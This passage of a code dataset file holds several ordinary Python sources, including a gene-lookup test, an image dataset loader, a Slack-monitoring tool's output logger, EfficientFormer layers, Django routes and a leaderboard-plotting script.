coverage map from JSON with OpenCV.\",\n )\n\n parser.add_argument(\"json_path_data\", help=\"Path to the JSON data file\")\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n plot_sim()\n","repo_name":"PositiveBeat/nthom18-master-workspace","sub_path":"src/data_logging/utils/plot_json_coveragemap.py","file_name":"plot_json_coveragemap.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"30370325641","text":"import pytest\nfrom pytest_mock import MockerFixture\n\nfrom app.api.dtos import Gene\nfrom app.api.use_cases import GetInfoByGeneSymbol\nfrom app.core.db_config import AsyncSessionMaker\n\nsession_maker = AsyncSessionMaker\n\n\n@pytest.mark.asyncio\nasync def test_use_case_with_data(mocker: MockerFixture):\n mocker.patch(\n 'sqlalchemy.ext.asyncio.session.AsyncSession.execute',\n return_value=[\n ('gene_symbol', 'stable_id', 'transcript_id'),\n ('gene_symbol', 'stable_id', 'another_transcript_id'),\n ],\n )\n data = await GetInfoByGeneSymbol(gene_symbol='gene_symbol').execute()\n assert data == [\n Gene(\n **{\n 'gene_symbol': 'gene_symbol',\n 'gene_stable_id': 'stable_id',\n 'transcript_ids': ['transcript_id', 'another_transcript_id'],\n }\n )\n ]\n\n\n@pytest.mark.asyncio\nasync def test_use_case_no_data(mocker: MockerFixture):\n mocker.patch('sqlalchemy.ext.asyncio.session.AsyncSession.execute', return_value=[])\n data = await GetInfoByGeneSymbol(gene_symbol='gene_symbol').execute()\n assert data == []\n","repo_name":"cleeper-fly/tech_test","sub_path":"tests/genes/test_use_cases.py","file_name":"test_use_cases.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"32061232903","text":"import sys\r\nimport glob\r\nfrom natsort import natsorted\r\nsys.path.append(\"..\")\r\nfrom datasets.Base import BaseDataset\r\n\r\n\r\nclass SICE_Dataset(BaseDataset):\r\n\t\"\"\"\r\n\tSICE dataset file structure:\r\n\t\tdataset_dir/\t# base_dir\r\n\t\t\tDataset_Part1/\t\t\t# train set\r\n\t\t\t\t1/\t\t\t\t# image 1\r\n\t\t\t\t2/\t\t\t\t# image 2\r\n\t\t\t\t...\r\n\t\t\t\tlabel/\r\n\t\t\t\t\t1.jpg\t\t# target 1\r\n\t\t\t\t\t...\r\n\t\t\tDataset_Part2/\t\t\t# test set\r\n\t\t\t\t1/\t\t\t\t# image 1\r\n\t\t\t\t2/\t\t\t\t# image 2\r\n\t\t\t\t...\r\n\t\t\t\tlabel/\r\n\t\t\t\t\t1.jpg\t\t# target 1\r\n\t\t\t\t\t...\r\n\t\"\"\"\r\n\tdef __init__(self, image_dir, resize=None, augment=False, low_res=None, under_expose_only=False):\r\n\t\t# SICE dataset has multiple exposure level for 1 input image, if under_expose_only is enabled,\r\n\t\t# we will grab only lower-half of the exposure levels (under-exposed)\r\n\t\tself.under_expose_only = under_expose_only\r\n\t\tsuper().__init__(image_dir, resize, augment, low_res)\r\n\r\n\tdef extract_image_pairs(self, dataset_dir):\r\n\t\t\"\"\"\r\n\t\textract images paired with corresponding reference images (under Label/)\r\n\t\t- under_expose_only: if enabled, only select under-exposed images for each scene,\r\n\t\t\te.g. if there are 7 images, select only the first 3 images;\r\n\t\t\t\tif there are 9 images, select only the first 4 images.\r\n\t\treturn:\r\n\t\t\tlist of tuple paths,\r\n\t\t\t\te.g. [(some-dir/1/1.jpg, some-dir/label/1.jpg), (some-dir/1/2.jpg, some-dir/label/1.jpg), ...]\r\n\t\t\"\"\"\r\n\t\tlabel_list = glob.glob(dataset_dir + \"Label/**.**\", recursive=True)\r\n\t\tlabel_list = natsorted(label_list)\r\n\t\tdata_list = []\r\n\t\tfor i, label_path in enumerate(label_list):\r\n\t\t\tjpgs = glob.glob(dataset_dir + str(i+1) + \"/**.**\")\r\n\t\t\tjpgs = natsorted(jpgs)\r\n\t\t\tif self.under_expose_only:\r\n\t\t\t\t# remove over-exposed images\r\n\t\t\t\tjpgs = jpgs[:len(jpgs)//2]\r\n\t\t\t# add (image, reference) pair to data list\r\n\t\t\tfor jpg in jpgs:\r\n\t\t\t\tdata_list.append((jpg, label_path))\r\n\t\t\r\n\t\treturn data_list\r\n\t\r\n\r\nif __name__ == \"__main__\":\r\n\t# Example of how to use this dataset\r\n\ttrain_dir = \"/home/ppnk-wsl/capstone/Dataset/SICE/Dataset_Part1/\"\r\n\ttest_dir = \"/home/ppnk-wsl/capstone/Dataset/SICE/Dataset_Part2/\"\r\n\r\n\ttrain_set = SICE_Dataset(train_dir)\r\n\ttest_set = SICE_Dataset(test_dir, under_expose_only=True)\r\n\r\n\r\n","repo_name":"bznick98/bilateral-image-enhance","sub_path":"datasets/SICE.py","file_name":"SICE.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4483481861","text":"import argparse\nimport socket\nfrom jubatus.classifier.client import Classifier\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-n\", \"--name\", help=\"set the name of the file to be saved\")\nparser.add_argument(\"--host\", help=\"set the host address\")\nparser.add_argument(\"--port\", help=\"set the port number\")\n\nargs = parser.parse_args()\nprint(args)\nhost_ip = args.host if args.host else socket.gethostbyname(socket.gethostname())\nport = args.port if args.port else 9199\n\nclient = Classifier(host_ip, port, '')\nif args.name:\n client.save(args.name)\n print(\"file saved at /tmp of the \"+host_ip+\" unless you specified output path with -d/--datadir when you started server process.\")\nelse:\n print(\"[Error] specify the model's name to be saved!\")","repo_name":"nobuyukioishi/Jubatus-utils","sub_path":"jubatus_model_saver.py","file_name":"jubatus_model_saver.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21266905734","text":"import json\nimport dataclasses\nimport logging\nimport os\nimport sys\nimport logging.handlers\nimport re\nimport traceback\nimport csv\nfrom collections.abc import Mapping\nfrom logging import Logger\nfrom typing import Any, Dict, List, ClassVar, Protocol\nfrom colorama import Fore, Back, Style, init\n\n\nclass StdoutLogger:\n def __init__(self, **kwargs):\n self.debug = kwargs.get('debug')\n self.print_header()\n init()\n\n def log(self,\n mes_type: str,\n message: Any,\n **kwargs) -> None:\n\n notify_type = kwargs.get('notify_type')\n\n if not self.debug and mes_type == 'DEBUG':\n return\n\n if dataclasses.is_dataclass(message):\n message = dataclasses.asdict(message)\n\n if notify_type == \"workspace\":\n message = f'WORKSPACE: \\n' \\\n f' ID: {message.get(\"id\")} \\n' \\\n f' NAME: {message.get(\"name\")} \\n' \\\n f' DOMAIN: {message.get(\"domain\")} \\n' \\\n f' URL: {message.get(\"url\")}'\n mes_type = 'WORKSPACE'\n if notify_type == \"user\":\n message = f'USER: \\n' \\\n f' ID: {message.get(\"id\")} \\n' \\\n f' NAME: {message.get(\"display_name\")} \\n' \\\n f' EMAIL: {message.get(\"email\")} \\n' \\\n f' JOB_TITLE: {message.get(\"title\")} \\n' \\\n f' ADMIN: {message.get(\"is_admin\")} \\n' \\\n f' OWNER: {message.get(\"is_owner\")} \\n' \\\n f' HAS_2FA: {message.get(\"has_2fa\")}'\n mes_type = 'USER'\n if notify_type == \"result\":\n if message.get('message'):\n if message.get('message').get('conversation').get('is_im'):\n conversation_type = 'Direct Message'\n elif message.get('message').get('conversation').get('is_private'):\n conversation_type = 'Private Channel'\n else:\n conversation_type = 'Public Channel'\n\n if isinstance(message.get('message').get('user'), Mapping):\n user = f\"{message.get('message', {}).get('user', {}).get('display_name')} -\" \\\n f\" {message.get('message', {}).get('user', {}).get('email')}\"\n else:\n user = message.get('message').get('user')\n\n message = 'POST_TYPE: Message' \\\n f' POSTED_BY: {user}' \\\n f' POSTED_ON: {message.get(\"message\").get(\"created\")} \\n' \\\n f' CONVERSATION: {message.get(\"message\").get(\"conversation\").get(\"name\")}' \\\n f' CONVERSATION_TYPE: {conversation_type}' \\\n f' URL: {message.get(\"message\").get(\"permalink\")} \\n' \\\n f' POTENTIAL_SECRET: {message.get(\"match_string\")} \\n' \\\n f' -----'\n\n elif message.get('file'):\n message = 'POST_TYPE: File' \\\n f' POSTED_BY: {message.get(\"user\", {}).get(\"display_name\")} ' \\\n f'- {message.get(\"user\").get(\"email\")}' \\\n f' CREATED: {message.get(\"file\").get(\"created\")} \\n' \\\n f' FILE_NAME: {message.get(\"file\").get(\"name\")} \\n' \\\n f' PRIVATE_URL: {message.get(\"file\").get(\"url_private_download\")} \\n' \\\n f' PUBLIC_PERMALINK: {message.get(\"file\").get(\"permalink_public\")} \\n' \\\n f' -----'\n mes_type = 'RESULT'\n try:\n self.log_to_stdout(message, mes_type)\n except Exception as e:\n print(e)\n self.log_to_stdout(message, mes_type)\n\n def log_to_stdout(self,\n message: Any,\n mes_type: str) -> None:\n\n try:\n\n reset_all = Style.NORMAL + Fore.RESET + Back.RESET\n key_color = Fore.WHITE\n base_color = Fore.WHITE\n high_color = Fore.WHITE\n style = Style.NORMAL\n\n if mes_type == \"NOTIFY\":\n base_color = Fore.CYAN\n high_color = Fore.CYAN\n key_color = Fore.CYAN\n style = Style.NORMAL\n elif mes_type == 'INFO':\n base_color = Fore.WHITE\n high_color = Fore.WHITE\n key_color = Fore.WHITE\n style = Style.DIM\n mes_type = '-'\n elif mes_type == 'WORKSPACE':\n base_color = Fore.LIGHTBLUE_EX\n high_color = Fore.LIGHTBLUE_EX\n key_color = Fore.LIGHTBLUE_EX\n style = Style.NORMAL\n mes_type = '+'\n elif mes_type == 'USER':\n base_color = Fore.RED\n high_color = Fore.RED\n key_color = Fore.RED\n style = Style.NORMAL\n mes_type = '+'\n elif mes_type == 'WARNING':\n base_color = Fore.YELLOW\n high_color = Fore.YELLOW\n key_color = Fore.YELLOW\n style = Style.NORMAL\n mes_type = '!'\n elif mes_type == \"SUCCESS\":\n base_color = Fore.LIGHTGREEN_EX\n high_color = Fore.LIGHTGREEN_EX\n key_color = Fore.LIGHTGREEN_EX\n style = Style.NORMAL\n mes_type = '>>'\n elif mes_type == \"DEBUG\":\n base_color = Fore.WHITE\n high_color = Fore.WHITE\n key_color = Fore.WHITE\n style = Style.DIM\n mes_type = '#'\n elif mes_type == \"ERROR\":\n base_color = Fore.MAGENTA\n high_color = Fore.MAGENTA\n key_color = Fore.MAGENTA\n style = Style.NORMAL\n elif mes_type == \"CRITICAL\":\n base_color = Fore.RED\n high_color = Fore.RED\n key_color = Fore.RED\n style = Style.NORMAL\n elif mes_type == \"RESULT\":\n base_color = Fore.LIGHTGREEN_EX\n high_color = Fore.LIGHTGREEN_EX\n key_color = Fore.LIGHTGREEN_EX\n style = Style.NORMAL\n mes_type = '!'\n\n # Make log level word/symbol coloured\n type_colorer = re.compile(r'([A-Z]{3,})', re.VERBOSE)\n mes_type = type_colorer.sub(high_color + r'\\1' + base_color, mes_type.lower())\n # Make header words coloured\n header_words = re.compile('([A-Z_0-9]{2,}:)\\s', re.VERBOSE)\n message = header_words.sub(key_color + Style.BRIGHT + r'\\1 ' + Fore.WHITE + Style.NORMAL, str(message))\n sys.stdout.write(\n f\"{reset_all}{style}[{base_color}{mes_type}{Fore.WHITE}]{style} {message}{Fore.WHITE}{Style.NORMAL}\\n\")\n except Exception:\n if self.debug:\n traceback.print_exc()\n sys.exit(1)\n print('Formatting error')\n\n def print_header(self) -> None:\n print(\" \".ljust(79) + Style.BRIGHT)\n\n print(Fore.MAGENTA + Style.BRIGHT +\n \"\"\"\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠾⠛⢉⣉⣉⣉⡉⠛⠷⣦⣄⠀⠀⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠋⣠⣴⣿⣿⣿⣿⣿⡿⣿⣶⣌⠹⣷⡀⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⠁⣴⣿⣿⣿⣿⣿⣿⣿⣿⣆⠉⠻⣧⠘⣷⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⡇⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⠈⠀⢹⡇⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡇⢸⣿⠛⣿⣿⣿⣿⣿⣿⡿⠃⠀⠀⠀⠀⢸⡇⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣷⠀⢿⡆⠈⠛⠻⠟⠛⠉⠀⠀⠀⠀⠀⠀⣾⠃⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣧⡀⠻⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⠃⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢼⠿⣦⣄⠀⠀⠀⠀⠀⠀⠀⣀⣴⠟⠁⠀⠀⠀\n ⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣦⠀⠀⠈⠉⠛⠓⠲⠶⠖⠚⠋⠉⠀⠀⠀⠀⠀⠀\n ⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n ⠀⠀⠀⠀⣠⣾⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n ⠀⠀⠀⣾⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n ⠀ ⠈⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n \"\"\" + Style.RESET_ALL\n )\n print(' Slack Watchman ')\n print(Style.DIM + ' Slack enumeration and exposed secrets detection tool ' + Style.RESET_ALL)\n print(' ')\n print(Style.BRIGHT + ' by PaperMtn - GNU General Public License')\n print(' '.ljust(79) + Fore.GREEN)\n\n\nclass EnhancedJSONEncoder(json.JSONEncoder):\n def default(self, o):\n if dataclasses.is_dataclass(o):\n return dataclasses.asdict(o)\n return super().default(o)\n\n\nclass JSONLogger(Logger):\n def __init__(self, name: str = 'Slack Watchman', **kwargs):\n super().__init__(name)\n self.notify_format = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", \"level\": \"NOTIFY\", \"scope\": \"%(scope)s\", \"severity\": '\n '\"%(severity)s\", \"detection_type\": \"%(type)s\", \"detection_data\": %(message)s}')\n self.info_format = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", \"level\": \"%(levelname)s\", \"message\": \"%(message)s\"}')\n self.success_format = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", \"level\": \"SUCCESS\", \"message\": \"%(message)s\"}')\n self.user_format = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", \"level\": \"USER\", \"message\": %(message)s}')\n self.workspace_format = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", \"level\": \"WORKSPACE\", \"message\": %(message)s}')\n self.logger = logging.getLogger(self.name)\n self.handler = logging.StreamHandler(sys.stdout)\n self.logger.addHandler(self.handler)\n if kwargs.get('debug'):\n self.logger.setLevel(logging.DEBUG)\n else:\n self.logger.setLevel(logging.INFO)\n\n def bind(self):\n pass\n\n def log(self,\n level: str,\n log_data: str or Dict,\n **kwargs):\n if level.upper() == 'NOTIFY':\n self.handler.setFormatter(self.notify_format)\n self.logger.info(\n json.dumps(\n log_data,\n cls=EnhancedJSONEncoder),\n extra={\n 'scope': kwargs.get('scope', ''),\n 'type': kwargs.get('detect_type', ''),\n 'severity': kwargs.get('severity', '')})\n elif level.upper() == 'INFO':\n self.handler.setFormatter(self.info_format)\n self.logger.info(log_data)\n elif level.upper() == 'DEBUG':\n self.handler.setFormatter(self.info_format)\n self.logger.debug(log_data)\n elif level.upper() == 'USER':\n self.handler.setFormatter(self.user_format)\n self.logger.info(json.dumps(\n log_data,\n cls=EnhancedJSONEncoder))\n elif level.upper() == 'WORKSPACE':\n self.handler.setFormatter(self.workspace_format)\n self.logger.info(json.dumps(\n log_data,\n cls=EnhancedJSONEncoder))\n elif level.upper() == 'SUCCESS':\n self.handler.setFormatter(self.success_format)\n self.logger.info(log_data)\n else:\n self.handler.setFormatter(self.info_format)\n self.logger.critical(log_data)\n\n\nclass IsDataclass(Protocol):\n __dataclass_fields__: ClassVar[Dict]\n\n\ndef export_csv(csv_name: str, export_data: List[IsDataclass]) -> None:\n \"\"\" Export the data passed in a dataclass to CSV file\n\n Args:\n csv_name: Name of the CSV file to create\n export_data: Dataclass object to create CSV from\n \"\"\"\n try:\n headers = dataclasses.asdict(export_data[0]).keys()\n with open(f'{os.path.join(os.getcwd(), csv_name)}.csv', 'w') as f:\n writer = csv.DictWriter(f, fieldnames=headers)\n writer.writeheader()\n for item in export_data:\n writer.writerow(dataclasses.asdict(item))\n f.close()\n except Exception as e:\n print(e)\n","repo_name":"PaperMtn/slack-watchman","sub_path":"src/slack_watchman/sw_logger.py","file_name":"sw_logger.py","file_ext":"py","file_size_in_byte":12676,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"91"}
+{"seq_id":"70577499502","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport itertools\nfrom utils.timmfunc import DropPath\n\n\nclass PatchEmbedding(nn.Module):\n\n def __init__(self, patch_size=16, stride=16, padding=0,\n in_chans=3,embed_dim=768):\n super().__init__()\n self.proj = nn.Conv2d(in_chans,embed_dim, kernel_size=patch_size,\n stride=(stride,stride),padding=(padding,padding))\n self.norm = nn.BatchNorm2d(embed_dim)\n\n\n def forward(self, x):\n x = self.proj(x)\n x = self.norm(x)\n return x\n\n\nclass Flat(nn.Module):\n\n def __init__(self, ):\n super().__init__()\n\n def forward(self, x):\n x = x.flatten(2).transpose(1, 2)\n return x\n\n\nclass StemConv(nn.Module):\n\n def __init__(self,in_chs, out_chs):\n super(StemConv,self).__init__()\n self.conv1 = nn.Conv2d(in_chs, out_chs, kernel_size=2, stride=2, padding=0)\n self.batch1 = nn.BatchNorm2d(out_chs)\n self.act1 = nn.ReLU()\n # self.conv2 = nn.Conv2d(out_chs//2, out_chs,kernel_size=2, stride=2, padding=0)\n # self.batch2 = nn.BatchNorm2d(out_chs)\n # self.act2 = nn.ReLU()\n\n\n def forward(self, x):\n x = self.act1(self.batch1(self.conv1(x)))\n # x = self.act2(self.batch2(self.conv2(x)))\n return x\n\n\n\n# pool_size, stride=1, padding=pool_size // 2,\n\nclass MB4D(nn.Module):\n\n def __init__(self, in_chs, h_chs,out_chs):\n super(MB4D,self).__init__()\n self.pool = nn.AvgPool2d(kernel_size=3,stride=1,padding=1)\n self.conv1 = nn.Conv2d(in_chs,h_chs,stride=1, kernel_size=1)\n self.batch1 = nn.BatchNorm2d(h_chs)\n self.act = nn.GELU()\n self.conv2 = nn.Conv2d(h_chs,out_chs,stride=1,kernel_size=3,padding=1)\n self.batch2 = nn.BatchNorm2d(out_chs)\n \n\n def forward(self, x):\n x_h = self.pool(x) + x\n out = self.batch1(self.conv1(x_h))\n out = self.act(out)\n out = self.batch2(self.conv2(out))\n out = out + x_h\n\n return out\n\n\n\nclass Attention(torch.nn.Module):\n def __init__(self, dim=384, key_dim=32, num_heads=8,\n attn_ratio=4,\n resolution=7):\n super().__init__()\n self.num_heads = num_heads\n self.scale = key_dim ** -0.5\n self.key_dim = key_dim\n self.nh_kd = nh_kd = key_dim * num_heads\n self.d = int(attn_ratio * key_dim)\n self.dh = int(attn_ratio * key_dim) * num_heads\n self.attn_ratio = attn_ratio\n h = self.dh + nh_kd * 2\n\n self.qkv = nn.Linear(dim, h)\n self.proj = nn.Linear(self.dh, dim)\n\n points = list(itertools.product(range(resolution), range(resolution)))\n N = len(points)\n attention_offsets = {}\n idxs = []\n for p1 in points:\n for p2 in points:\n offset = (abs(p1[0] - p2[0]), abs(p1[1] - p2[1]))\n if offset not in attention_offsets:\n attention_offsets[offset] = len(attention_offsets)\n idxs.append(attention_offsets[offset])\n self.attention_biases = torch.nn.Parameter(\n torch.zeros(num_heads, len(attention_offsets)))\n self.register_buffer('attention_bias_idxs',\n torch.LongTensor(idxs).view(N, N))\n\n @torch.no_grad()\n def train(self, mode=True):\n super().train(mode)\n if mode and hasattr(self, 'ab'):\n del self.ab\n else:\n self.ab = self.attention_biases[:, self.attention_bias_idxs]\n\n def forward(self, x): # x (B,N,C)\n B, N, C = x.shape\n qkv = self.qkv(x)\n q, k, v = qkv.reshape(B, N, self.num_heads, -1).split([self.key_dim, self.key_dim, self.d], dim=3)\n\n \n\n q = q.permute(0, 2, 1, 3)\n k = k.permute(0, 2, 1, 3)\n v = v.permute(0, 2, 1, 3)\n\n\n \n\n attn = (\n (q @ k.transpose(-2, -1)) * self.scale\n # +\n # (self.attention_biases[:, self.attention_bias_idxs]\n # if self.training else self.ab)\n )\n attn = attn.softmax(dim=-1)\n x = (attn @ v).transpose(1, 2).reshape(B, N, self.dh)\n x = self.proj(x)\n return x\n\n\nclass MB3D(nn.Module):\n\n def __init__(self, dim, mlp_ratio=4.,\n act_layer=nn.GELU, norm_layer=nn.LayerNorm,\n drop=0., drop_path=0.,\n use_layer_scale=True, layer_scale_init_value=1e-5):\n\n super().__init__()\n\n self.norm1 = norm_layer(dim) \n self.token_mixer = Attention(dim)\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = LinearMlp(in_features=dim, hidden_features=mlp_hidden_dim,\n act_layer=act_layer, drop=drop)\n\n self.drop_path = DropPath(drop_path) if drop_path > 0. \\\n else nn.Identity()\n self.use_layer_scale = use_layer_scale\n if use_layer_scale:\n self.layer_scale_1 = nn.Parameter(\n layer_scale_init_value * torch.ones((dim)), requires_grad=True)\n self.layer_scale_2 = nn.Parameter(\n layer_scale_init_value * torch.ones((dim)), requires_grad=True)\n\n def forward(self, x):\n if self.use_layer_scale:\n x = x + self.drop_path(\n self.layer_scale_1.unsqueeze(0).unsqueeze(0)\n * self.token_mixer(self.norm1(x)))\n x = x + self.drop_path(\n self.layer_scale_2.unsqueeze(0).unsqueeze(0)\n * self.mlp(self.norm2(x)))\n\n else:\n x = x + self.drop_path(self.token_mixer(self.norm1(x)))\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\nclass LinearMlp(nn.Module):\n \"\"\" MLP as used in Vision Transformer, MLP-Mixer and related networks\n \"\"\"\n\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.drop1 = nn.Dropout(drop)\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop2 = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop1(x)\n x = self.fc2(x)\n x = self.drop2(x)\n return x","repo_name":"Inha-HCI/LifeOfTire","sub_path":"Efficientformer/layers/Efficientformer_l.py","file_name":"Efficientformer_l.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"40960307047","text":"# coding=utf-8\nfrom django.conf.urls.defaults import patterns, include, url\nfrom dictionary.views import Index, Bibliography, About, Manual\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'synonyms.views.home', name='home'),\n # url(r'^synonyms/', include('synonyms.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n url(r'^$', Index.as_view()),\n url(r'^dictionaries/', Bibliography.as_view()),\n url(r'^about/', About.as_view()),\n url(r'^howto/', Manual.as_view()),\n)\n","repo_name":"Sereni/synonyms","sub_path":"synonyms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"32565306461","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import font_manager as fm, rcParams\n\nfrom kivy.logger import Logger\n\nimport json, random\nimport jsonRequests\n\ndef multiplyColor(c, a): return tuple((i*a for i in c))\n\n\ndef nearColor(a, b):\n\tl = [abs(x-y) for (x,y) in zip(a,b)]\n\tthreshold = .05\n\tfor i in l:\n\t\tif i > threshold:\n\t\t\treturn False\n\treturn True\n\ndef checkColors(l, a):\n\tfor i in l:\n\t\tif nearColor(i, a):\n\t\t\treturn True\n\treturn False\n\n#Resolution\nwidth = 1920.0\nheight = 864.0\nDPI = float(72)\n\n#Bar Width\nbar_width = 0.8\n\n#Base color\nbase_color = (.280, .592, 1)\n\n\nplt.rc('font',family='serif')\nplt.rc('font',serif='Roboto')\n\n#title font\ntitleFont = {\"fontsize\":70, \"family\":'serif', \"weight\":\"light\"}\n\n\n#axis font\naxisFont = {\"fontsize\":30}\n\n\n\ndef saveImage(jsonData, outputFile):\n\n\tfig = plt.figure(figsize=(width/DPI, height/DPI), dpi=DPI)\n\tplt.ylim(ymax=10)\n\tnames = sorted([result[\"name\"] for result in jsonData[\"results\"]])\n\tpeople = []\n\tindex = 0\n\n\t##Iterate through everything and get the names of every account.\n\n\taccts = set()\n\tfor result in jsonData[\"results\"]:\n\t\tfor acct in result[\"accts\"]:\n\t\t\taccts.add(acct[\"name\"])\n\n\taccts = list(accts)\n\tinternals = [\"1 - SA - Internal\", \"2 - SA - App Dev\"]\n\n\tfor internal in internals:\n\t\tif internal in accts:\n\t\t\taccts.remove(internal)\n\n\tinternals.sort()\n\n\taccts = accts + internals\n\n\n\tcolorDict = {\"1 - SA - Internal\":(.5,.5,.5), \"2 - SA - App Dev\":(.7,.7,.7)} # Map account to color.\n\tusedColors = []\n\n\tbars = []\n\tacct_list = []\n\n\tLogger.info(\"Time Slip Grapher: Adding bars.\")\n\n\tperson_map = {}\n\n\tfor result in jsonData[\"results\"]:\n\t\tperson_map[result[\"name\"]] = 0\n\t\tif len(result[\"accts\"]) > 0:\n\t\t\tname = result[\"name\"]\n\t\t\tperson_map[name] = 0\n\t\t\tfor acct in result[\"accts\"]:\n\t\t\t\tperson_map[name] += acct[\"amount\"]\n\n\tresults = jsonData[\"results\"]\n\n\n\tresults.sort(key = lambda x: person_map[x[\"name\"]], reverse=True)\n\n\tfor result in results:\n\t\tif len(result[\"accts\"]) > 0:\n\t\t\tresource_name = result[\"name\"]\n\t\t\tpeople.append(resource_name)\n\t\t\tbottom = 0\n\t\t\tfor acct_name in accts:\n\t\t\t\tfor acct in result[\"accts\"]:\n\t\t\t\t\tif acct_name == acct[\"name\"]:\n\t\t\t\t\t\tname = acct[\"name\"]\n\n\t\t\t\t\t\tif name not in colorDict:\n\t\t\t\t\t\t\tc = base_color\n\t\t\t\t\t\t\twhile (checkColors(usedColors, c)):\n\t\t\t\t\t\t\t\tstrength = random.random()\n\t\t\t\t\t\t\t\tc = multiplyColor(base_color, strength)\n\t\t\t\t\t\t\tcolorDict[name]=c\n\t\t\t\t\t\t\tusedColors.append(c)\n\n\t\t\t\t\t\tcolor = colorDict[name]\n\t\t\t\t\t\tamt = acct[\"amount\"]\n\t\t\t\t\t\tp, = plt.bar(index, (amt), bar_width, bottom=bottom, color=color, label=name)\n\t\t\t\t\t\tif name not in acct_list:\n\t\t\t\t\t\t\tbars.append(p)\n\t\t\t\t\t\t\tacct_list.append(name)\n\t\t\t\n\t\t\t\t\t\tbottom = bottom + amt\n\n\t\t\tindex = index + 1\n\n\tplt.legend(handles=bars, labels=acct_list, loc=1, fontsize=\"large\")\n\n\tlow_bar_height = 4.5\n\n\tvalues = list([low_bar_height for i in range(len(people))])\n\n\tplt.plot(np.arange(len(people)), values , color=(0,0,0))\n\n\thigh_bar_height = 9\n\n\tvalues = list([high_bar_height for i in range(len(people))])\n\n\tplt.plot(np.arange(len(people)), values , color=(0,0,0))\n\n\tplt.title('Time Slip Leaderboard',fontdict=titleFont)\n\tplt.tick_params(axis='both', which='major', labelsize=14)\n\tplt.xticks(np.arange(len(people)), people)\n\tplt.yticks(np.arange(0, 12, 2))\n\tplt.ylabel('Hours Spent', fontdict = axisFont)\n\n\tLogger.info(\"Time Slip Grapher: Saving...\")\n\n\tplt.savefig(outputFile)\n\n\tLogger.info(\"Time Slip Grapher: Done!\")\n\ndef getJsonData():\n\turl = \"https://www.softwareanywhere.com/services/apexrest/TimeSlips\"\n\tresponse = jsonRequests.getResponse(url)\n\tif response.status:\n\t\tparsed = json.loads(response.raw.decode('string-escape').strip('\"'))\n\t\treturn parsed\n\telse:\n\t\treturn False\n\n\nif __name__ == \"__main__\":\n\tjsonData = getJsonData()\n\tsaveImage(jsonData, \"testGraph.png\")\n\n","repo_name":"nvblueboy/Work-TV","sub_path":"TimeSlipGraphUtility.py","file_name":"TimeSlipGraphUtility.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
